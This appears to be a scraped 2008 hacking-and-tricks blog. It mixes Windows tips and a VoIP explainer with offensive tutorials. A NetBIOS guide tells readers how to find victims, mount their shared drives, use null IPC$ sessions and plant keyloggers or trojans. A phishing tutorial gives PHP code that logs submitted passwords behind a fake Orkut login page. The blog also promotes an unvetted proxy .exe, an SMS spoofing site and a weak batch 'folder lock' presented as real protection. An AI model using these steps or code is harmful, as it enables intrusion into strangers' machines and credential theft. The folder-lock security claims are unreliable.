--> Disk Partition Manager- diskpart
--> Display Properties- control desktop
--> Display Properties- desk.cpl
--> Display Properties (w/Appearance Tab Preselected)- control color
--> Dr. Watson System Troubleshooting Utility- drwtsn32
--> Driver Verifier Utility- verifier
--> Event Viewer- eventvwr.msc
--> Files and Settings Transfer Tool- migwiz
--> File Signature Verification Tool- sigverif
--> Findfast- findfast.cpl
--> Firefox (if installed)- firefox
--> Folders Properties- control folders
--> Fonts- control fonts--> Fonts Folder- fonts
--> Free Cell Card Game- freecell
--> Game Controllers- joy.cpl
--> Group Policy Editor (XP Prof)- gpedit.msc
--> Hearts Card Game- mshearts
--> Help and Support- helpctr
--> HyperTerminal- hypertrm
--> Iexpress Wizard- iexpress
--> Indexing Service- ciadv.msc
--> Internet Connection Wizard- icwconn1
--> Internet Explorer- iexplore
--> Internet Setup Wizard- inetwiz
--> Internet Properties- inetcpl.cpl

Hacking with NetBIOS

2008-08-25T00:09:00.000-07:00

Hack using NetBIOS ( hacking someones remote computer)

I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS

A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it also works on a port . It has been assigned a port number 139.

THE NBTSTAT COMMAND

You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get

c:\windows>

If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.

Now lets play with the NBTSTAT command.

If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example

NetBIOS Remote Machine Name Table

Name Number Type Usage

==========================================================================

workgroup 00 G Domain Name

my_computer 03 U Messenger Service

myusername 03 U Messenger Service

MAC Address = 00-02-44-14-23-E6

Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.

This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command

NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156

WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.

TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service

Searching for a victim

You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.

Lets Hack -Part 1 Remotely reading/writing to a victiim's computer

Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let suppose that the output comes out to be

NetBIOS Remote Machine Name Table

Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities

1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .

2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.

---------------------------------------------------------------------------------------------------------

Now our next step would be to view the drive or folders the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let suppose we get the following output

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
CDISK Disk

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like

Shared resources at \\203.195.136.156

ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
HP-6L Print

"Print " shows that the victim is sharing a printer named as HP-6L

If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.

Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.

Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .

Lets do it.

We will use the NET command to do our work .

Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!

Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -

Windows 95

Windows 98

Windows Me

Using IPC$ to hack Windows NT,2000,XP

Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.

We hackers use IPC$ in this way

c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""

You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.

Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.

Penetrating in to the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...

But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission

Lets Hack - Part 2 Denial of service attack

This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.

Note- This tutorial may bear a resemblance to tutorials written by other authors

Voice-over-Internet protocol [VOIP]

2008-08-23T08:13:00.000-07:00

Voice-over-Internet protocol is a protocol optimized for the transmission of voice through the Internet or other packet-switched networks. VoIP is often used abstractly to refer to the actual transmission of voice (rather than the protocol implementing it). This latter concept is also referred to as IP telephony, Internet telephony, voice over broadband, broadband telephony, and broadband phone.

VoIP providers may be viewed as commercial realizations of the experimental Network Voice Protocol (1973) invented for the ARPANET providers. Some cost savings are due to using a single network to carry voice and data, especially where users have underused network capacity that can carry VoIP at no additional cost. VoIP-to-VoIP phone calls are sometimes free, while VoIP calls connecting to public switched telephone networks (VoIP-to-PSTN) may have a cost that is borne by the VoIP user.

Voice-over-IP systems carry telephony signals as digital audio, typically reduced in data rate using speech data compression techniques, encapsulated in a data-packet stream over IP.

There are two types of PSTN-to-VoIP services: Direct inward dialing (DID) and access numbers. DID will connect a caller directly to the VoIP user, while access numbers require the caller to provide an extension number for the called VoIP user.

*Mobile Number Portability (MNP) in the Internet Telephony Environment

Mobile number portability (MNP) also impacts the internet telephony, or VOIP (Voice over IP) business. A voice call originated in the VOIP environment which is routed to a mobile phone number of a traditional mobile carrier also face challenges to reach its destination in case the mobile phone number is ported. Mobile number portability is a service that makes it possible for subscribers to keep their existing mobile phone number when changing the service provider (or mobile operator).

VoIP is clearly identified as a Least Cost Routing (LCR) voice routing system, which is based on checking the destination of each telephone call as it is made, and then sending the call via the network that will cost the customer the least. With GSM number portability now in place, LCR providers can no longer rely on using the network root prefix to determine how to route a call. Instead, they now need to know the actual current network of every number before routing the call.

Therefore, VoIP solutions also need to handle MNP when routing a voice call. In countries without a central database like UK it might be necessary to query the GSM network about the home network a mobile phone number belongs to. As VoIP starts to take off in the enterprise markets because of least cost routing options, it needs to provide a certain level of reliability when handling calls.

MNP checks are important to assure that this quality of service is met; by handling MNP lookups before routing a call and assuring that the voice call will actually work, VoIP companies give businesses the necessary reliability they look for in an internet telephony provider. UK-based messaging operator Tyntec provides a Voice Network Query service, which helps not only traditional voice carriers but also VoIP providers to query the GSM network to find out the home network of a ported number.

In countries such as Singapore, the most recent Mobile number portability solution is expected to open the doors to new business opportunities for non-traditional telecommunication service providers like wireless broadband providers and voice over IP (VoIP) providers.

In November 2007, the Federal Communications Commission in the United States released an order extending number portability obligations to interconnected VoIP providers and carriers that support VoIP providers.

*Mobile phones and hand-held devices

Telcos and consumers have invested billions of dollars in mobile phone equipment. In developed countries, mobile phones have achieved nearly complete market penetration, and many people are giving up landlines and using mobiles exclusively. Given this situation, it is not entirely clear whether there would be a significant higher demand for VoIP among consumers until either public or community wireless networks have similar geographical coverage to cellular networks (thereby enabling mobile VoIP phones, so called WiFi phones or VoWLAN) or VoIP is implemented over 3G networks. However, "dual mode" telephone sets, which allow for the seamless handover between a cellular network and a WiFi network, are expected to help VoIP become more popular.[12]

Phones like the NEC N900iL, and later many of the Nokia Eseries and several WiFi enabled mobile phones have SIP clients hardcoded into the firmware. Such clients operate independently of the mobile phone network unless a network operator decides to remove the client in the firmware of a heavily branded handset. Some operators such as Vodafone actively try to block VoIP traffic from their network[13] and therefore most VoIP calls from such devices are done over WiFi.

Several WiFi only IP hardphones exist, most of them supporting either Skype or the SIP protocol. These phones are intended as a replacement for PSTN based cordless phones but can be used anywhere where WiFi internet access is available.

Another addition to hand held devices are ruggedized bar code type devices that are used in warehouses and retail environments. These type of devices rely on "inside the 4 walls" type of VoIP services that do not connect to the outside world and are solely to be used from employee to employee communications.

Phishing Tutorials

2008-08-20T01:04:00.001-07:00

Ok so first:

1- Go take the source of the website you want to phish.

2-When you got it, create on your desktop a file named index.txt

in that one, you will paste the source.

3- verify that all the images and other files like javascript and css are linked to the originale website. so if the website is

CODE

http://www.website.com/file.html

, copy

CODE

http://www.website.com/

before all other files that you find. so if an image is image/poo.gif, it should be

4- after all that is done, change the .txt extension to .htm or .html
and verify the website looks the same. if it doesnt, it is maybe
because the css contains images. then you would need to download the
css, and make the same process as 3rd step.

Not that if you upload the new css on ur host, you dont need to put the
real host in front of it. if it is in the same path as index.html, you
can let is as stylesheet.css or whatever it is

5-make a file named post.txt and add the following content in it:

PHP Code:

CODE

header ('Location: [url="http://THE"]http://THE[/url] ORIGINAL WEBSITE HERE ');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

change the extension .txt to .php. after that, you need to
gochange the place where the html file send the information. so open
your index.html with notepad and search action=. after u found it,
change the content in the " " to post.php.

6-now simply create file name log.txt where alll password of phished material will come

Now U Need A Host i prefer by way freehostia.com

How To Register and Upload Their

1 First Goto This url

CODE

http://freehostia.com/signup.html

And Register for a free account their.In The Domain Name Select Use a subdomain.

2 Login To Your Cpanel And select Site Management

Reduced: 50% of original size [ 1018 x 239 ] - Click to view full image

3 Now Select File Manage

Reduced: 50% of original size [ 1015 x 283 ] - Click to view full image

4 Now Click Your Domain Name (Wait For some minutes If the Url is Not listed)

Reduced: 68% of original size [ 748 x 382 ] - Click to view full image

5 Select browse And Uplaod all The Files

Reduced: 73% of original size [ 696 x 329 ] - Click to view full image

6 I Have taken Example Of Orkut Fake Login Page

get The Url Of the .html Page

like This (Your Domain name).freehostia.com/orkut.html

Reduced: 72% of original size [ 709 x 332 ] - Click to view full image

7 A new .TXT file will appear in the Directory were u have Uploaded all the files Cointaing
The login imformation

Reduced: 74% of original size [ 683 x 367 ] - Click to view full image

7 Now Check the Box near Logins and select permission 700 and click change

Reduced: 72% of original size [ 707 x 334 ] - Click to view full image

Thats All Happy Hacking

Self Made Tutorial Say Thanks If u Like It

Fast Proxy

2008-08-20T01:02:00.000-07:00

Presenting And Unlimited Fast Proxy For You Guise To Surf Anonymously Around The Net . They Are Very Fast And Unblocks All Softwares And Sites

*****************************

Download:

CODE

http://rapidshare.com/files/114653845/U89.exe

Found It While Surfing

Convert an IP address to an IP Number

2008-08-19T23:34:00.001-07:00

Convert an IP address to an IP Number

IP address (IPv4 / IPv6) is divided into 4 sub-blocks. Each sub-block has a different weight number each powered by 256. IP number is being used in the database because it is efficient to search between a range of number in database.

Beginning IP number and Ending IP Number are calculated based on following formula:

IP Number = 16777216*w + 65536*x + 256*y + z (Formula 1)

where
IP Address = w.x.y.z

For example, if IP address is "202.186.13.4", then its IP Number "3401190660" is based on the Formula 1.

IP Address = 202.186.13.4

So, w = 202, x = 186, y = 13 and z = 4

IP Number = 16777216*202 + 65536*186 + 256*13 + 4
= 3388997632 + 12189696 + 3328 + 4
= 3401190660

To reverse IP number to IP address,

w = int ( IP Number / 16777216 ) % 256
x = int ( IP Number / 65536 ) % 256
y = int ( IP Number / 256 ) % 256
z = int ( IP Number ) % 256

where % is the mod operator and int is return the integer part of the division.

Demystify “thumbs.db”

2008-08-19T23:30:00.001-07:00

Demystify “thumbs.db”

Are you working as a cyber crime investigator and looking for something which can prove in court of law that there was some pornographic content on the suspect’s machine? Let me help you out in this case.There is a file with a name “thumbs.db” which is automatically generated by Windows XP whenever user views the folder or image in thumbs view or in filmstrip view. Automatic generation of this file is ON by default. Thumbs.db contains a copy of each of the tiny preview images generated for image files in that folder so that they load up quickly the next time you browse that folder. If a user tries to view this file by any image viewer then it will be of no use. For extracting the juicy content from this file, forensic investigator has to understand the header of the thumbs file present in thumbs.db. Let me explain step by step on how to extract useful content from thumbs.db file.

Open any folder which has got some jpeg files and make that folder view in thumbs view as shown in

http://2.bp.blogspot.com/_kEJJtYsk89Q/SHuoc0ClK1I/AAAAAAAAAQQ/zCYf8K2-ez4/s320/fig1.JPG

As soon as the folder is kept in thumbs view “thumbs.db” file is created. Even if all JPEG files are deleted and thumbs.db file corresponding to those JPEG files is present, then also you can see the images but they will be very small in size. Thumbs.db which was created is now viewed using winhex. Once the file has been opened in winhex view, we will search and select for particular header. Header is “ÿØÿà JFIF” and its hex values are “FFD8FFE000104A464946″. This is shown in an example :-

http://3.bp.blogspot.com/_kEJJtYsk89Q/SHupjF2pUtI/AAAAAAAAAQg/xcYNtEqSxE0/s400/fig2.JPG

Copy the entire content in a notepad where the header is starting till the end of the file and save the file with the extension JPEG. You can now easily view the extracted content with any of the image viewer. If there are large number of headers in thumbs.db file, then you can use professional tool like “Windows File Analyzer” to see the contents of thumbs.db file.

WEBSITE OF CYBER CRIME CELL MUMBAI

2008-08-19T23:25:00.000-07:00

WEBSITE OF CYBER CRIME CELL MUMBAI

http://www.cybercellmumbai.com

2008-08-19T23:18:00.000-07:00

Install OS on your Pendrive.......

is possible to install OS on your Pen Drive...but u dosent mentioned which OS u want to install on your pen Drive....

Thr r lots of Operating System that can be install on your pen drive without much efforts... Here I'm providing u a brief introduction and direct link to download "Damn Small Linux" Operating System..

"Damn Small Linux" also refer as "DSL" is a Linux distribution operating system that was developed to run even on lower specification systems, including computers which would otherwise go out of use. This distribution is this much small that it can fit inside a 50MB live CD or on any USB Pendrive larger then 64MB.

Feature:--
Boot from a business card CD as a live linux distribution (LiveCD)
Boot from a USB pen drive
Boot from within a host operating system (that's right, it can run *inside* Windows)
Run very nicely from an IDE Compact Flash drive via a method we call "frugal install"
Transform into a Debian OS with a traditional hard drive install
Run light enough to power a 486DX with 16MB of Ram
Run fully in RAM with as little as 128MB (you will be amazed at how fast your computer can be!)
Modularly grow -- DSL is highly extendable without the need to customize

Download Link:-- http://iso.linuxquestions.org/download/http/distro.ibiblio.org/dsl-3.3.iso
(Alternate link)
http://iso.linuxquestions.org/download/ftp/ftp.belnet.be/dsl-3.3.iso
http://iso.linuxquestions.org/download/http/mirrors.alien2thisworld.net/dsl-3.3.iso
http://iso.linuxquestions.org/download/http/distro.ibiblio.org/dsl-3.3.iso

How To install on your Pen Drive:-- http://www.pendrivelinux.com/2007/01/02/all-in-one-usb-dsl/

pypiyu......

password protect ur folders using simple trick!!!!!!!!

2008-08-19T23:12:00.000-07:00

lock, hide & password protect ur folders!!!!!!!!

trick to lock folder
using this trick not only for locking folder but also hide it....

copy following script:-

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

now go for following few steps
1.paste above text into notepad.
2.the text which is written in pink letters delete it & type u r password there.
3.save that file by extension .bat ( name is ur choice)
4.now on ur screen there is a bat file appear.
5.double click on that file.
6.a new folder named locker will appear on the screen.
7.keep the files and folders u want to lock in that locker folder.
8.now again double click on that batch file to lock that locker folder.
9.after locking that folder it will become hidden.
10.to open that folder double click on that bat file
11.type ur password & open that folder.

plz reply ur experience........

If ur data will be lost its easy to get this back...........

1. just copy the script from here again.
2. make the batch file again in the same location.
3. and if u have remembered the password then edit password in the program.
4. double click on the batch file & u will get the options back to recover ur data.

SOME TRICKS 2

2008-08-19T23:09:00.000-07:00

Easy Access to Folders from the Toolbar

You can quickly access commonly used folders from your Toolbar
Right click on an open area of the Toolbar
Select Toolbars / New Toolbar
Browse to the directory you want to add
Now on the toolbar you will see the name of that folder displayed.
Click on the >> to open any sub-folders as well.
Organizing the Start / Programs Listing

As you add more and more programs, the listing of them in Start / Programs can get fairly long.One solution is to categorize your programs into several groups, create a folder for those groups, and move the shortcuts to those folders.
For example:
Start the Explorer
Go to Windows / Start Menu / Programs
Create new folders with the categories you want (e.g. Graphics, Utilities, Internet etc.)
Now move the shortcuts to those programs in Windows / Start Menu / Programs to whichever category you decide.
This can greatly reduce clutter and make it a lot easier to find your programs.
Note: Windows2000 and WindowsXP Users will need to go to the C:\Documents and Settings\All Users\Start Menu\Programs directory

Restoring a Lost Desktop

If you ever lose the Desktop but Explorer is still running with the Start Button, you can do this to bring back your Desktop in a Windows box.
Click Start
Click Run
Type a period " . "
Then press Enter
Submitted by

Creating a New E-Mail Shortcut

To create a shortcut that will open your default e-mail program starting a new e-mail,
Right click on an open area of the desktop
Select New / Shortcut
For the Command Line, enter mailto:
For the title enter something like New E-Mail
When you click on this your default e-mail program should start with a new e-mail form.

Creating 3D Window Effect

You can create a nice 3D effect for your windows
Start Regedit
Go to HKEY_CURRENT_USER \ Control Panel \ Colors
Make sure the following setting are there:
ButtonHilight=128 128 128
ButtonShadow=255 255 255

Creating Shutdown, Restart and Logoff Icons

To create the icons, create a shortcut on the desktop.
For Shutdown, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows
For Restart, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec
For Logoff, the command is C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0

Having your Favorites and Start Menus Sort Alphabetically

If your Start Menu Program or Favorites are not sorting alphabetically, it is easy to fix this:
Start Regedit
Go to HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/MenuOrder
Under here is are Favorites and Start Menu folders
In each there is a value called Order
Simply delete (or rename this) and restart Winodws
Your Favorites or Start Menus should now sort alphabetically

Increasing the Icon Cache

Run Regedit
Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer
Create a new string called Max Cached Icons
Give it a value of 10000
This will increase response time in windows and give the Shellicon cache file more elbow room.

Make Icons 256 Color 16-Bit

Open the Registry
Hit Ctrl+F
Type Shell Icon BPP
When found, right click the Shell Icon BPP icon
Click Modify
Change the value from 4 to 16
Click Ok
Close the registry
Restart your computer

Removing Shortcut Arrows

An easy way to remove those irritating arrows from your desktop shortcut icons and not change their properties
Right click the Desktop / Properties / Appearance tab
Select Item
Scroll for Icon
The default size is 32
Change this to 30
Clicking Apply

Adding the Control Panel to the Start Menu

Open up the Explorer
Go to \WINDOWS\Start Menu
Right click in the right-hand panel
Add a new folder
Name it Control Panel.{21ec2020-3aea-1069-a2dd-08002b30309d}
This makes getting to the Control Panel items a little easier

Making Desktop Changes Permanent

To make changes to the Desktop like window size, positon after rebooting:
Start Regedit
Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Create a New Binary Value
Name it NoSaveSettings
Give it a value of 01 00 00 00
Easy Shortcuts on the Desktop

Here is an easy way to put shortcuts on the Desktop where they can easily be moved to other group icons.
Using the Explorer, create a SHORTCUT to the \Windows\Desktop directory in your \Windows\SEND TO directory.
Now whenever you want to make a shortcut and move it to the desktop:
Just make the shortcut you want using Explorer
Right click on that shortcut
In the pop up menu select the Send To and Desktop shortcut

Sms spoofing
www.sharpmail.co.uk chek this site for sms spoofing

PYPIYU.............

SOME TRICKS

2008-08-19T23:05:00.000-07:00

Allowing Network Access with Blank Passwords (XP and Vista)

Although you can log in locally without a password, by default, WindowsXP Pro does not allow network users to access the computer without a password. Typically you will receive an Unknown error 31 if this is the case.
To change this setting:
Run gpedit.msc
Go to Computer Configuration / Windows Settings / Security Settings / Local Policies / Security Options
Double click on Accounts: Limit local account use of blank passwords to console login only
Disable this option
Disabling the F3 Search Key

If you want to disable the ability to use the F3 key from either the Windows Explorer or Internet Explorer
Start Regedit
Go to HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
Create a Dword value called NoFindFiles
Give it a value of 1
Reboot
Preventing Changes to File Associations

You can prevent users from changing associations via Windows Explorer's Tools / Folder Options / File Types tab.
Start Regedit
Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explore
Create REG_DWORD data type NoFileAssociate
Give it a value of 1
Submitted by Paul Barker
Locking File Associations

If you have your file associations the way you want for a particular file type, you can remove it from the list that gets displayed in the Folder Options / File Types screen
Start Regedit
Go to HKEY_CLASSES_ROOT
Scroll to the file association you want to lock.
In the right panel, create a new Binary value
Call it EditFlags
Give it a value of 01 00 00 00
Now when you go to the Folder Options / File Types screen, you won't see that file type listed.
Submitted by Paul Barker

Turning off System Beeps

If you want to turn off all system beeps (like the ones that go through your computers' internal speaker):
Start Regedit
Go to HKEY_CURRENT_USER\Control Panel\Sound
Edit the key Beep and give it a value of No
Download reg file

Changing the Location Of Special Folders

You can modify the registry to change the location of special folders like:
My Documents
Favorites
My Pictures
Personal
Start Regedit
Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Double click on any locations you want to change and alter the path
Logoff or restart for the changes to go into effect
Note: TweakUI from Microsoft will allow you to make these changes from a dialog box as well

Deleting Specific Registry Value

In a previous tip, Automatically Deleting a Registry Key, it was mentioned how to remove an entire registry key.If you want to simply remove a specific value within a key, use the syntax below:
[Registry Key]"value"=-
For example:
REGEDIT4[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "MSConfig"=-
would delete the value MSCONFIG.
Submitted by Brent Towsley

Setting the Recycle Bin to Always Delete

You can set the recycle bin to always delete items (like holding down the shift key when dragging files to the recycle bin)
Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ BitBucket
Set the key NukeOnDelete to 1
Download reg file

Setting the Internet Explorer Home Page

If you want to set the home page used by Internet Explorer through the registry
Start Regedit
Go to HKey_Current_User \ Software \ Microsoft \ Internet Explorer \ Main
Give the Start Page key the string value you wish set as homepage
Submitted by Austin Henderson

Preparing to Move Hard Drive to Another Computer

To remove the devices from device manager when taking a HD from one computer to another,simply:
Run Regedit
Go to HKEY_LOCAL_MACHINE\ and delete the Enum section
This removes all of the hardware specific settings
Submitted by Lee Berry

Comparing Registries

While working with changes to your system, you might want to see what is changing in your Registry.Since you can export it to a text file, the steps are fairly easy
Start Regedit
With the very top level select - My Computer, on the Toolbar select Registry / Export Registry File
I usually save it to the root of the C: drive with the name before (you don't need to add an extension)
Make the change to your system
Go back to Regedit
Press F5 to update it
Export the Registry like step 2
Name the file after and have it go in the same directory
Open up a DOS window
Go to the directory where the two exported files are
Enter FC before.reg after.reg > diff.txt
Then you can edit diff.txt with your favorite text editor.
Note: I do the last steps so often I have a simple batch file already set up.

Hack Yahoo Acoount While Chatting!!

2008-08-19T05:29:00.000-07:00

Ok Before We get Started This Is not My page I also Recommend this Site http://crack0hack.wetpaint.com

Im also not Sure If this Works Hundred Percent

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio

1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED

3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1e> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

Ok so you will ask now what next???
No you find what you can do with this network than me explaining everything.
so post ur comments and lemme know....

So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.

Hackin With IP :D

2008-08-19T04:42:00.000-07:00

